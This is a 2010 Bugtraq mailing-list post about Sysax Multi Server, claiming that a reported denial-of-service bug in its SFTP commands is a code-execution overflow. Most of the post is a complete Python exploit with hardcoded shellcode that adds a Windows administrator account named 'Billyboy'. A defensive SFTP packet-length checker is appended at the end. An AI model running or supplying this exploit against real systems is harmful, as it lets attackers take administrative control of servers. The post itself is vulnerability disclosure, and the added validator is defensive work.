Re: Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities
- From: rob@xxxxxxxxxxxxxxxxxxxx
- Date: 26 Jun 2010 23:45:59 -0000
Assuming the server is running as admin, the overflow can actually be used to
execute arbitrary code. In our example we spawn an instance of cmd.exe and
create a new admin, Billyboy, with a password of woot.
This has been tested with Windows XP SP2.
+-------- Start Exploit --------+
import paramiko
import sys
t_ip = "192.168.1.104" #target IP
t_port = 4019 #target port
password = "asdf" #password for user
username = "asdf" #Known user
transport = paramiko.Transport((t_ip, t_port))
transport.connect(username = username, password = password)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.chdir("./") #Execute a good command
buff_pen = "\x90" * 389
buff_pen += "\x65\x82\xa5\x7c" #Point EIP to JMP ESP command in shell32.dll
buff_pen += "\x90" * 3
buff_pen += \
"\xeb\x13\x5b\x31\xc0\x50\x53\xbb\x4d\x11\x86\x7c\xff\xd3\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x42\x69\x6c\x6c\x79\x62\x6f\x79\x20\x77\x6f\x6f\x74\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x45\x78\x70\x41\x64\x6d\x69\x6e\x00"
#Shellcode to make a new admin, billyboy, with a password of 'woot'
buff_pen += "\x90" * 3
buff_pen += "\xcc" * (800 - len(buff_pen))
sftp.get(buff_pen)
+-------- Stop Exploit --------+
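
A defender-side check for the "open" request named in the thread subject, as an added example that is not part of the original post or of the vendor's code: it parses a length-prefixed SFTP version 3 SSH_FXP_OPEN packet and rejects oversized or malformed paths before they can reach a fixed-size buffer. The 255-byte limit, the UTF-8 requirement and the function names are assumptions chosen for illustration; the sample packets are constructed.

```python
import struct

SSH_FXP_OPEN = 3        # packet type number from the SFTP v3 draft
MAX_PATH_BYTES = 255    # assumed policy limit, below the 389-byte offset in the post


def build_open(req_id, path, pflags=1):
    """Build a sample SSH_FXP_OPEN packet (constructed test input)."""
    body = struct.pack(">BI", SSH_FXP_OPEN, req_id)
    body += struct.pack(">I", len(path)) + path
    body += struct.pack(">II", pflags, 0)   # pflags, then empty ATTRS flags
    return struct.pack(">I", len(body)) + body


def check_open(packet):
    """Return (ok, reason) for one length-prefixed SFTP packet."""
    if len(packet) < 5:
        return False, "truncated header"
    (length,) = struct.unpack(">I", packet[:4])
    body = packet[4:]
    if length != len(body):
        return False, "length field does not match packet size"
    if body[0] != SSH_FXP_OPEN:
        return True, "not an open request"
    if len(body) < 9:
        return False, "truncated open request"
    (path_len,) = struct.unpack(">I", body[5:9])
    # Never trust the declared string length over the bytes actually received.
    if path_len > len(body) - 9:
        return False, "path length exceeds packet"
    path = body[9:9 + path_len]
    if path_len > MAX_PATH_BYTES:
        return False, "path too long (%d bytes)" % path_len
    if any(b < 0x20 or b == 0x7F for b in path):
        return False, "control byte in path"
    try:
        path.decode("utf-8")
    except UnicodeDecodeError:
        return False, "path is not valid UTF-8"
    return True, "ok"
```

The same length and byte checks apply to the other path-carrying requests listed in the subject line; logging the rejected request's length gives responders a signal that is independent of the payload contents.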